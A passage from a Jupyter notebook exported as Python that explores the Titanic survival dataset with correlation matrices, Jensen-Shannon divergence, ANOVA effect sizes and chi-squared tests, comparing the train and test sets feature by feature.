plt.bar(dataset.columns.values, missing_data_percent, bottom=data_percent, color='#E76C5D', linewidth=0)
axs.yaxis.set_major_formatter(PercentFormatter(xmax=1))
# #### Train set
# In[ ]:
train_df.isnull().sum().to_frame('Missing values').transpose()
# In[ ]:
plot_missing_values(train_df)
# #### Test set
# In[ ]:
test_df.isnull().sum().to_frame('Missing values').transpose()
# In[ ]:
plot_missing_values(test_df)
# `Age` and `Cabin` have quite a lot of missing values in both datasets, we will have to deal with those later.
# ### 3.5 Exploring numerical features
# Let's plot the **Pearson's correlation matrix** of the raw numerical features to get a sense of linear correlations between them.
#
# The coefficients of the matrix for variables $X$ and $Y$ are computed as follows:
#
# $$\rho _{X,Y}={\frac {\operatorname {cov} (X,Y)}{\sigma _{X}\sigma _{Y}}}={\frac {\operatorname {E} [(X-\mu _{X})(Y-\mu _{Y})]}{\sigma _{X}\sigma _{Y}}}$$
#
# It means that variables show a strong linear correlation if the absolute value of the coefficient is close to one.
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,6))
corr_train = train_df[['Age', 'Fare', 'Parch', 'SibSp', 'Survived']].corr()
corr_test = test_df[['Age', 'Fare', 'Parch', 'SibSp']].corr()
# Generate masks for the upper triangles
mask_train = np.zeros_like(corr_train, dtype=np.bool)
mask_train[np.triu_indices_from(mask_train)] = True
mask_test = np.zeros_like(corr_test, dtype=np.bool)
mask_test[np.triu_indices_from(mask_test)] = True
# Generate a custom diverging colormap
cmap = sns.diverging_palette(220, 10, as_cmap=True)
# Draw the train set heatmap with the mask and correct aspect ratio
sns.heatmap(corr_train, ax=ax1, mask=mask_train, cmap=cmap, vmax=.5, center=0, square=True,
linewidths=.5, cbar_kws={"shrink": .5}, annot=True, fmt='.2f')
ax1.set_title('Pearson\'s correlation matrix of train set')
# Draw the test heatmap with the mask and correct aspect ratio
sns.heatmap(corr_test, ax=ax2, mask=mask_test, cmap=cmap, vmax=.5, center=0, square=True,
linewidths=.5, cbar_kws={"shrink": .5}, annot=True, fmt='.2f')
ax2.set_title('Pearson\'s correlation matrix of test set')
# Three remarks:
# * it seems that `Fare` has the strongest linear correlation with `Survived`, making it a strong feature ;
# * `Parch` and `SibSp` show a potentially strong linear correlation, it might be a good idea to combine those features ;
# * except with `Fare`, the `Age` feature shows different correlation coefficients between the train set and the test set.
#
# Because of that last remark, we will try to get more insights by computing the **Jensen-Shannon divergence** between the distributions of the train set and the test set. It is a measure of similarity between two probability distributions based on the **Kullback-Leibler divergence** well-known in information theory.
#
# It is defined as:
#
# $${{\rm {JSD}}}(P\parallel Q)={\frac {1}{2}}D_{\mathrm {KL}}(P\parallel M)+{\frac {1}{2}}D_{\mathrm {KL}}(Q\parallel M)$$
#
# where $M={\frac {1}{2}}(P+Q)$ and $D_{\mathrm {KL}}$ is the KL divergence.
# In[ ]:
from scipy.stats import entropy
from numpy.linalg import norm
def JSD(P, Q, n_iter=1000):
"""
Computes the Jensen-Shannon divergence between two probability distributions of different sizes.
:param P: distribution P
:param Q: distribution Q
:param n_iter: number of iterations
:return: Jensen-Shannon divergence
"""
size = min(len(P),len(Q))
results = []
for _ in range(n_iter):
P = np.random.choice(P, size=size, replace=False)
Q = np.random.choice(Q, size=size, replace=False)
_P = P / norm(P, ord=1)
_Q = Q / norm(Q, ord=1)
_M = 0.5 * (_P + _Q)
results.append(0.5 * (entropy(_P, _M) + entropy(_Q, _M)))
return results
# ### Univariate analysis
# Let's first analyze features individually.
#
# #### Age
# In[ ]:
# Age vs Survived
g = sns.FacetGrid(train_df, col='Survived', size=4, aspect=2)
g = g.map(sns.distplot, 'Age', color='#D66A84')
# Even though it just looks like sums of Gaussian distributions, we can clearly observe the impact of `Age` on `Survival` with *very young passengers* and *probably parents passengers* having more chance to survive. (remember that about 20% of the data is missing)
#
# Let's now see how the test set is distributed compared to the train set.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.distplot(train_df['Age'].dropna(), ax=ax1, color='#D66A84')
ax1.set_title('Train set')
sns.distplot(test_df['Age'].dropna(), ax=ax2, color='#D66A84')
ax2.set_title('Test set')
# We see that the `Age` feature alone won't be of great help predicting survival on the test set since most of it is composed of 20-30 years passengers which is a range 50/50 chance of survival.
#
# Let's compute the JS divergence for `Age`, we will compare this value later with other features.
# In[ ]:
age_jsd = JSD(train_df['Age'].dropna().values, test_df['Age'].dropna().values)
print('Jensen-Shannon divergence of Age:', np.mean(age_jsd))
print('Standard deviation:', np.std(age_jsd))
# **Conclusion:** to use `Age`, we will have to impute 20% missing data (not that easy), create bins to avoid overfitting and/or mix it with other features.
# #### Fare
# In[ ]:
# Fare vs Survived
g = sns.FacetGrid(train_df, col='Survived', palette=palette, size=4, aspect=2)
g = g.map(sns.distplot, 'Fare', color='#25627D')
# In[ ]:
fig, ax = plt.subplots(figsize=(18,4))
g = sns.distplot(train_df['Fare'], ax=ax, color='#25627D', label='Skewness : %.2f'%(train_df['Fare'].skew()))
g = g.legend(loc='best')
# The `Fare` feature is right-skewed, if we want to make discriminant bins we'll have to address this concern later.
#
# The skewness of a random variable $X$ is the third standardized moment $\gamma _{1}$, defined as:
#
# $${\displaystyle \gamma _{1}=\operatorname {E} \left[\left({\frac {X-\mu }{\sigma }}\right)^{3}\right]={\frac {\mu _{3}}{\sigma ^{3}}}={\frac {\operatorname {E} \left[(X-\mu )^{3}\right]}{\ \ \ (\operatorname {E} \left[(X-\mu )^{2}\right])^{3/2}}}={\frac {\kappa _{3}}{\kappa _{2}^{3/2}}}}$$
#
# Let's now see how the test set is distributed compared to the train set.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.distplot(train_df['Fare'].dropna(), ax=ax1, color='#25627D')
ax1.set_title('Train set')
sns.distplot(test_df['Fare'].dropna(), ax=ax2, color='#25627D')
ax2.set_title('Test set')
# `Fare` looks almost evenly distributed between the train set and the test set.
#
# Let's compute the JS divergence for `Fare`, we will compare this value later with other features.
# In[ ]:
fare_jsd = JSD(train_df['Fare'].dropna().values, test_df['Fare'].dropna().values)
print('Jensen-Shannon divergence of Fare:', np.mean(fare_jsd))
print('Standard deviation:', np.std(fare_jsd))
# **Conclusion:** to use `Fare`, we will have to impute 1 missing value, fix the tailed distribution and create bins to avoid overfitting and/or mix it with other features.
# #### Parch
# In[ ]:
palette6 = ["#F6B5A4", "#EB7590", "#C8488A", "#872E93", "#581D7F", "#3A1353"]
# Parch vs Survived
g = sns.catplot(x='Parch', y='Survived', saturation=5, height=4, aspect=4, data=train_df, kind='bar', palette=palette6)
g.despine(left=True)
g = g.set_ylabels("Survival probability")
# At first glance, we can say that if passengers happened to have a relatively small family on the Titanic, they were more likely to survive. We have to stay careful though because 3 and 5 have high standard deviations.
#
# Let's now see how the test set is distributed compared to the training set.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.distplot(train_df['Parch'], ax=ax1, color='#84B044')
ax1.set_title('Train set')
sns.distplot(test_df['Parch'], ax=ax2, color='#84B044')
ax2.set_title('Test set')
# `Parch` looks like it is evenly distributed between both sets but it is quite not the case.
#
# Let's compute the JS divergence for `Parch`, we will compare this value later with other features.
# In[ ]:
parch_jsd = JSD(train_df['Parch'].values, test_df['Parch'].values)
print('Jensen-Shannon divergence of Parch:', np.mean(parch_jsd))
print('Standard deviation:', np.std(parch_jsd))
# **Conclusion:** we can use `Parch` as is or mix it with other features.
# #### SibSp
# In[ ]:
palette7 = ["#F7BBA6", "#ED8495", "#E05286", "#A73B8F", "#6F2597", "#511B75", "#37114E"]
# SibSp feature vs Survived
g = sns.catplot(x='SibSp', y='Survived', saturation=5, height=4, aspect=4, data=train_df, kind='bar', palette=palette7)
g.despine(left=True)
g = g.set_ylabels("Survival probability")
# It seems that single passengers or with two other persons had more chance to survive.
#
# Let's now see how the test set is distributed compared to the training set.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.distplot(train_df['SibSp'], ax=ax1, color='#E76C5D')
ax1.set_title('Train set')
sns.distplot(test_df['SibSp'], ax=ax2, color='#E76C5D')
ax2.set_title('Test set')
# `SibSp` looks like it is evenly distributed between both sets but it is quite not the case.
#
# Let's compute the JS divergence for `SibSp`, we will compare this value later with other features.
# In[ ]:
sibsp_jsd = JSD(train_df['SibSp'].values, test_df['SibSp'].values)
print('Jensen-Shannon divergence of SibSp:', np.mean(sibsp_jsd))
print('Standard deviation:', np.std(sibsp_jsd))
# **Conclusion:** we can use `SibSp` as is or mix it with other features.
# #### Differences between the distributions of the train set and the test set
# By looking at the JS divergence, we can tell how the distributions of invidual features differ. Keep in mind that it is ok to observe some divergence.
# In[ ]:
palette4 = ["#F19A9B", "#D54D88", "#7B2A95", "#461765"]
fig, ax = plt.subplots(figsize=(18,4))
jsd = pd.DataFrame(np.column_stack([age_jsd, fare_jsd, parch_jsd, sibsp_jsd]), columns=['Age', 'Fare', 'Parch', 'SibSp'])
sns.boxplot(data=jsd, ax=ax, orient="h", linewidth=1, saturation=5, palette=palette4)
ax.set_title('Jensen-Shannon divergences of numerical features')
# ### Bivariate analysis
# Let's then see if there is an impact of a feature on another.
#
# #### Age vs Fare
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Age'], train_df['Fare'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Age')
plt.ylabel('Fare')
plt.title('Age vs Fare')
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.regplot(x='Age', y='Fare', ax=ax1, data=train_df)
ax1.set_title('Train set')
sns.regplot(x='Age', y='Fare', ax=ax2, data=test_df)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Age']['Fare'])
print('PCC for the test set: ', corr_test['Age']['Fare'])
# **Conclusion:** `Age` and `Fare` tend to be much more linearly correlated on the test set than on the train set. (remember that the `Fare` distribution is skewed though.
# #### Age vs Parch
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Age'], train_df['Parch'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Age')
plt.ylabel('Parch')
plt.title('Age vs Parch')
# In[ ]:
palette8 = ["#F8C1A8", "#EF9198", "#E8608A", "#C0458A", "#8F3192", "#63218F", "#4B186C", "#33104A"]
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Age', x='Parch', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette7)
ax1.set_title('Train set')
sns.boxplot(y='Age', x='Parch', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette8)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Age']['Parch'])
print('PCC for the test set: ', corr_test['Age']['Parch'])
# **Conclusion:** there are noticeable differences on the distributions of those features between the train set and the test set. It can be stabilized by making age bins though.
# #### Fare vs Parch
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Fare'], train_df['Parch'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Fare')
plt.ylabel('Parch')
plt.title('Fare vs Parch')
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='Parch', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette7)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='Parch', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette8)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Fare']['Parch'])
print('PCC for the test set: ', corr_test['Fare']['Parch'])
# **Conclusion:** although they have similar correlation coefficients, distributions differ between both sets.
# #### Fare vs SibSp
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Fare'], train_df['SibSp'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Fare')
plt.ylabel('SibSp')
plt.title('Fare vs SibSp')
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='SibSp', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette7)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='SibSp', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette8)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Fare']['SibSp'])
print('PCC for the test set: ', corr_test['Fare']['SibSp'])
# **Conclusion:** although they have similar correlation coefficients, distributions differ between both sets.
# #### Parch vs SibSp
# In[ ]:
plt.figure(figsize=(18, 4))
plt.scatter(train_df['Parch'], train_df['SibSp'], c=train_df['Survived'].values, cmap='cool')
plt.xlabel('Parch')
plt.ylabel('SibSp')
plt.title('Parch vs SibSp')
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Parch', x='SibSp', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette7)
ax1.set_title('Train set')
sns.boxplot(y='Parch', x='SibSp', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette8)
ax2.set_title('Test set')
# In[ ]:
print('PCC for the train set: ', corr_train['Parch']['SibSp'])
print('PCC for the test set: ', corr_test['Parch']['SibSp'])
# **Conclusion:** distributions look quite the same with strong correlation coefficients, we will combine them later.
# ### 3.6 Exploring categorical features
#
# ### Univariate analysis
#
# Let's first analyze features individually.
#
# #### Embarked
# In[ ]:
palette3 = ["#EE8695", "#A73B8F", "#501B73"]
# Embarked feature vs Survived
g = sns.catplot(x='Embarked', y='Survived', saturation=5, height=4, aspect=4, data=train_df,
kind='bar', palette=palette3)
g.despine(left=True)
g = g.set_ylabels('Survival probability')
# It's curious how an embarkment has an influence on `Survival`, this must be related to another feature and we'll dive in with bivariate analysis.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
train_df['Embarked'].value_counts().plot(kind='barh', ax=ax1)
ax1.set_title('Train set')
test_df['Embarked'].value_counts().plot(kind='barh', ax=ax2)
ax2.set_title('Test set')
# Quite similar distributions between the train set and the test set as we can see.
#
# **Conclusion:** we can use `Embarked` as is or mix it with other features.
# #### Sex
# Everyone watched *Titanic*, we all know that women were more likely to survive this disaster.
# In[ ]:
palette2 = ["#EE8695", "#A73B8F"]
# Sex feature vs Survived
g = sns.catplot(x='Sex', y='Survived', saturation=5, height=4, aspect=4, data=train_df,
kind='bar', palette=palette2)
g.despine(left=True)
g = g.set_ylabels('Survival probability')
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
train_df['Sex'].value_counts().plot(kind='barh', ax=ax1)
ax1.set_title('Train set')
test_df['Sex'].value_counts().plot(kind='barh', ax=ax2)
ax2.set_title('Test set')
# Quite similar distributions between the train set and the test set as we can see.
#
# **Conclusion:** we can use `Sex` as is or mix it with other features.
# #### Pclass
# In[ ]:
# Pclass feature vs Survived
g = sns.catplot(x='Pclass', y='Survived', saturation=5, height=4, aspect=4, data=train_df,
kind='bar', palette=palette3)
g.despine(left=True)
g = g.set_ylabels('Survival probability')
# Wealthier passengers had more influence on the Titanic, it appears that they were more likely to find a place on a lifeboat.
# In[ ]:
# Train set vs Test set
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
train_df['Pclass'].value_counts().plot(kind='barh', ax=ax1)
ax1.set_title('Train set')
test_df['Pclass'].value_counts().plot(kind='barh', ax=ax2)
ax2.set_title('Test set')
# Quite similar distributions between the train set and the test set as we can see.
#
# **Conclusion:** we can use `Pclass` as is or mix it with other features.
# ### Bivariate analysis
# Let's then see if there is an impact of a feature on another.
#
# #### Continuous and categorical variables
#
# When dealing with continuous and categorical variables, we can look at statistical significance through variance analysis (**ANOVA**).
#
# If we denote by $k_i$ the ith value for the continuous variable in the group, $n$ the number of passengers in each group, $T$ the sum of the continuous variable's values for all passengers and $N$ the number of passengers ; we can define $SS_{between}$ the *Sum of Squares Between*:
#
# $$SS_{between} = \frac{\sum(\sum k_i)ยฒ}{n} - \frac{Tยฒ}{N}$$
#
# If we denote by $Y$ a value of the continuous variable ; we can define $SS_{total}$ the *Sum of Squares Total*:
#
# $$SS_{total} = \sum Yยฒ - \frac{Tยฒ}{N}$$
#
# We then have access to the *effect size* $\etaยฒ$ which tells us how much the group has influenced the variable:
#
# $$\etaยฒ = \frac{SS_{between}}{SS_{total}}$$
#
# For the value of $\etaยฒ$, we will refer to *Cohen's d* guidelines which are as follows:
# * Small effect: 0.01
# * Medium effect: 0.059
# * Large effect: 0.138
# In[ ]:
import statsmodels.api as sm
from statsmodels.formula.api import ols
def compute_anova(dataset, group, weight):
"""
Computes the effect size through ANOVA.
:param dataset: pandas DataFrame
:param group: categorical feature
:param weight: continuous feature
:return: effect size
"""
mod = ols(weight + ' ~ ' + group, data=dataset).fit()
aov_table = sm.stats.anova_lm(mod, typ=2)
esq_sm = aov_table['sum_sq'][0]/(aov_table['sum_sq'][0]+aov_table['sum_sq'][1])
return esq_sm
# #### Continuous and continuous variables
# When dealing with two continuous variables, we can look at statistical independence through the $\chi^2$ test.
#
# In its general statement, if there are $r$ rows and $c$ columns in the dataset, the *theoretical frequency* for a value, given the hypothesis of independence, is:
#
# $$E_{{i,j}}=Np_{{i\cdot }}p_{{\cdot j}}$$
#
# where $N$ is the total sample size, and:
#
# $$p_{{i\cdot }}={\frac {O_{{i\cdot }}}{N}}=\sum _{{j=1}}^{c}{\frac {O_{{i,j}}}{N}}$$
#
# is the fraction of observations of type $i$ ignoring the column attribute, and:
#
# $${\displaystyle p_{\cdot j}={\frac {O_{\cdot j}}{N}}=\sum _{i=1}^{r}{\frac {O_{i,j}}{N}}}$$
#
# is the fraction of observations of type $j$ ignoring the row attribute. The term *frequencies* refers to absolute numbers rather than already normalised values.
#
# The value of the test-statistic is:
#
# $$\chi ^{2}=\sum _{{i=1}}^{{r}}\sum _{{j=1}}^{{c}}{(O_{{i,j}}-E_{{i,j}})^{2} \over E_{{i,j}}} = N\sum _{{i,j}}p_{{i\cdot }}p_{{\cdot j}}\left({\frac {(O_{{i,j}}/N)-p_{{i\cdot }}p_{{\cdot j}}}{p_{{i\cdot }}p_{{\cdot j}}}}\right)^{2}$$
#
# The null hypothesis $H_0$ is that the two variables are independent. We will then also look at the *p-value*. ($H_0$ rejected if $p \leq 0.05$)
# In[ ]:
from scipy.stats import chi2_contingency
def chisq(dataset, c1, c2):
"""
Performs the Chi squared independence test.
:param dataset: pandas DataFrame
:param c1: continuous feature 1
:param c2: continuous feature 2
:return: array with [Chi^2, p-value]
"""
groupsizes = dataset.groupby([c1, c2]).size()
ctsum = groupsizes.unstack(c1)
result = chi2_contingency(ctsum.fillna(0))
print('Chi^2:', result[0])
print('p-value:', result[1])
print('Degrees of freedom:', result[2])
# #### Embarked vs Age
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Age', x='Embarked', ax=ax1, data=train_df, linewidth=1, saturation=5, order=['S', 'C', 'Q'], palette=palette3)
ax1.set_title('Train set')
sns.boxplot(y='Age', x='Embarked', ax=ax2, data=test_df, linewidth=1, saturation=5, order=['S', 'C', 'Q'], palette=palette3)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Embarked', 'Age')
test_esq_sm = compute_anova(test_df, 'Embarked', 'Age')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Embarked` on `Age` is **low** (0.0019).
#
# For the **test set**, the effect of `Embarked` on `Age` is **low/medium** (0.0327).
#
# **Conclusion:** the effect of `Embarked` on `Age` differs for about **3%** between the two sets.
# #### Embarked vs Fare
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='Embarked', ax=ax1, data=train_df, linewidth=1, saturation=5, order=['S', 'C', 'Q'], palette=palette3)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='Embarked', ax=ax2, data=test_df, linewidth=1, saturation=5, order=['S', 'C', 'Q'], palette=palette3)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Embarked', 'Fare')
test_esq_sm = compute_anova(test_df, 'Embarked', 'Fare')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Embarked` on `Fare` is **medium/high** (0.0823).
#
# For the **test set**, the effect of `Embarked` on `Fare` is **medium/high** (0.1064).
#
# **Conclusion:** the effect of `Embarked` on `Fare` differs for about **2.4%** between the two sets.
# #### Embarked vs Parch
# Let's first write a quick function to plot the proportion of `Embarked` by another discrete variable.
# In[ ]:
def plot_embarked_variable(dataset, variable):
"""
Plots the proportion of variable values per Embarked value of a dataset.
:param dataset: pandas DataFrame
:param variable: variable to plot
"""
s_variable_index = dataset.groupby(['Embarked', variable]).size()['S'].index.values
c_variable_index = dataset.groupby(['Embarked', variable]).size()['C'].index.values
q_variable_index = dataset.groupby(['Embarked', variable]).size()['Q'].index.values
index = list(set().union(s_variable_index,c_variable_index,q_variable_index))
raw_s_variable = dataset.groupby(['Embarked', variable]).size()['S']
raw_c_variable = dataset.groupby(['Embarked', variable]).size()['C']
raw_q_variable = dataset.groupby(['Embarked', variable]).size()['Q']
s_variable = []
c_variable = []
q_variable = []
for i in range(max(index) + 1):
s_variable.append(raw_s_variable[i] if i in s_variable_index else 0)
c_variable.append(raw_c_variable[i] if i in c_variable_index else 0)
q_variable.append(raw_q_variable[i] if i in q_variable_index else 0)
percent_s_variable = [s_variable[i]/(s_variable[i] + c_variable[i] + q_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_c_variable = [c_variable[i]/(s_variable[i] + c_variable[i] + q_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_q_variable = [q_variable[i]/(s_variable[i] + c_variable[i] + q_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
r = list(range(max(index) + 1))
bars = [sum(x) for x in zip(percent_s_variable, percent_c_variable)]
fig, axs = plt.subplots(1,1,figsize=(18,4))
plt.bar(r, percent_s_variable, color='#08c299')
plt.bar(r, percent_c_variable, bottom=percent_s_variable, linewidth=0, color='#97de95')
plt.bar(r, percent_q_variable, bottom=bars, linewidth=0, color='#fce8aa')
plt.xticks(r, r)
plt.title('Proportion of Embarked values by ' + variable)
axs.legend(labels=['S', 'C', 'Q'])
axs.yaxis.set_major_formatter(PercentFormatter(xmax=1))
# Train set:
# In[ ]:
plot_embarked_variable(train_df, 'Parch')
chisq(train_df, 'Embarked', 'Parch')
# Test set:
# In[ ]:
plot_embarked_variable(test_df, 'Parch')
chisq(test_df, 'Embarked', 'Parch')
# **Conclusion:** It is worth noticing that `Embarked` and `Parch` **are not** considered independent on the test set but they **are** on the train set.
# #### Embarked vs SibSp
# Train set:
# In[ ]:
plot_embarked_variable(train_df, 'SibSp')
chisq(train_df, 'Embarked', 'SibSp')
# Test set:
# In[ ]:
plot_embarked_variable(test_df, 'SibSp')
chisq(test_df, 'Embarked', 'SibSp')
# **Conclusion:** `Embarked` and `SibSp` are not considered independent on the train set but they are on the test set.
# #### Embarked vs Sex
# In[ ]:
tmp_train_df = train_df.copy(deep=True)
tmp_train_df['Sex'].replace(['male', 'female'], [0,1], inplace=True)
plot_embarked_variable(tmp_train_df, 'Sex')
chisq(tmp_train_df, 'Embarked', 'Sex')
# In[ ]:
tmp_test_df = test_df.copy(deep=True)
tmp_test_df['Sex'].replace(['male', 'female'], [0,1], inplace=True)
plot_embarked_variable(tmp_test_df, 'Sex')
chisq(tmp_test_df, 'Embarked', 'Sex')
# It appears that on both sets, the proportion of male is higher from Southampton (S), thus influencing `Survival`.
#
# **Conclusion:** `Embarked` and `Sex` **are not** considered independent both on the train set and test set.
# #### Embarked vs Pclass
# Train set:
# In[ ]:
plot_embarked_variable(train_df, 'Pclass')
chisq(train_df, 'Embarked', 'Pclass')
# Test set:
# In[ ]:
plot_embarked_variable(test_df, 'Pclass')
chisq(test_df, 'Embarked', 'Pclass')
# It appears that the proportion of whealthy people is higher from Cherbourg (C), thus influencing `Survival`.
#
# **Conclusion:** `Embarked` and `Pclass` are considered **strongly dependent** both on the train set and test set.
# #### Sex vs Age
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Age', x='Sex', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette2)
ax1.set_title('Train set')
sns.boxplot(y='Age', x='Sex', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette2)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Sex', 'Age')
test_esq_sm = compute_anova(test_df, 'Sex', 'Age')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Sex` on `Age` is **low** (0.0086).
#
# For the **test set**, the effect of `Sex` on `Age` is **low** (1.6084e-10).
#
# **Conclusion:** the effect of `Sex` on `Age` differs for less than **1%** between the two sets.
# #### Sex vs Fare
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='Sex', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette2)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='Sex', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette2)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Sex', 'Fare')
test_esq_sm = compute_anova(test_df, 'Sex', 'Fare')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Sex` on `Fare` is **low/medium** (0.0332).
#
# For the **test set**, the effect of `Sex` on `Fare` is **low/medium** (0.0367).
#
# **Conclusion:** the effect of `Sex` on `Fare` differs for less than **1%** between the two sets.
# #### Sex vs Parch
# Let's first write a quick function to plot the proportion of `Sex` by another discrete variable.
# In[ ]:
def plot_sex_variable(dataset, variable):
"""
Plots the proportion of variable values per Sex value of a dataset.
:param dataset: pandas DataFrame
:param variable: variable to plot
"""
male_variable_index = dataset.groupby(['Sex', variable]).size()['male'].index.values
female_variable_index = dataset.groupby(['Sex', variable]).size()['female'].index.values
index = list(set().union(male_variable_index, female_variable_index))
raw_male_variable = dataset.groupby(['Sex', variable]).size()['male']
raw_female_variable = dataset.groupby(['Sex', variable]).size()['female']
male_variable = []
female_variable = []
for i in range(max(index) + 1):
male_variable.append(raw_male_variable[i] if i in male_variable_index else 0)
female_variable.append(raw_female_variable[i] if i in female_variable_index else 0)
percent_male_variable = [male_variable[i]/(male_variable[i] + female_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
percent_female_variable = [female_variable[i]/(male_variable[i] + female_variable[i]) if i in index else 0 for i in range(max(index) + 1)]
r = list(range(max(index) + 1))
fig, axs = plt.subplots(1,1,figsize=(18,4))
plt.bar(r, percent_male_variable, color='#ce2525')
plt.bar(r, percent_female_variable, bottom=percent_male_variable, linewidth=0, color='#ff6600')
plt.xticks(r, r)
plt.title('Proportion of Sex values by ' + variable)
axs.legend(labels=['male', 'female'])
axs.yaxis.set_major_formatter(PercentFormatter(xmax=1))
# Train set:
# In[ ]:
plot_sex_variable(train_df, 'Parch')
chisq(train_df, 'Sex', 'Parch')
# Test set:
# In[ ]:
plot_sex_variable(test_df, 'Parch')
chisq(test_df, 'Sex', 'Parch')
# **Conclusion:** `Sex` and `Parch` are considered **strongly dependent** both on the train set and test set.
# #### Sex vs SibSp
# Train set:
# In[ ]:
plot_sex_variable(train_df, 'SibSp')
chisq(train_df, 'Sex', 'SibSp')
# Test set:
# In[ ]:
plot_sex_variable(test_df, 'SibSp')
chisq(test_df, 'Sex', 'SibSp')
# **Conclusion:** `Sex` and `SibSp` are considered **strongly dependent** both on the train set and test set.
# #### Sex vs Pclass
# Train set:
# In[ ]:
plot_sex_variable(train_df, 'Pclass')
chisq(train_df, 'Sex', 'Pclass')
# Test set:
# In[ ]:
plot_sex_variable(test_df, 'Pclass')
chisq(test_df, 'Sex', 'Pclass')
# **Conclusion:** `Sex` and `Pclass` are considered **strongly dependent** both on the train set and test set.
# #### Pclass vs Age
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Age', x='Pclass', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette3)
ax1.set_title('Train set')
sns.boxplot(y='Age', x='Pclass', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette3)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Age', 'Pclass')
test_esq_sm = compute_anova(test_df, 'Age', 'Pclass')
print('ANOVA 1-way for the train set: ', train_esq_sm)
print('ANOVA 1-way for the test set: ', test_esq_sm)
# For the **train set**, the effect of `Pclass` on `Age` is **medium/high** (0.1363).
#
# For the **test set**, the effect of `Pclass` on `Age` is **high** (0.2422).
#
# **Conclusion:** the effect of `Pclass` on `Age` differs for about **11%** between the two sets.
# #### Pclass vs Fare
# In[ ]:
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18,4))
sns.boxplot(y='Fare', x='Pclass', ax=ax1, data=train_df, linewidth=1, saturation=5, palette=palette3)
ax1.set_title('Train set')
sns.boxplot(y='Fare', x='Pclass', ax=ax2, data=test_df, linewidth=1, saturation=5, palette=palette3)
ax2.set_title('Test set')
# In[ ]:
train_esq_sm = compute_anova(train_df, 'Fare', 'Pclass')
test_esq_sm = compute_anova(test_df, 'Fare', 'Pclass')
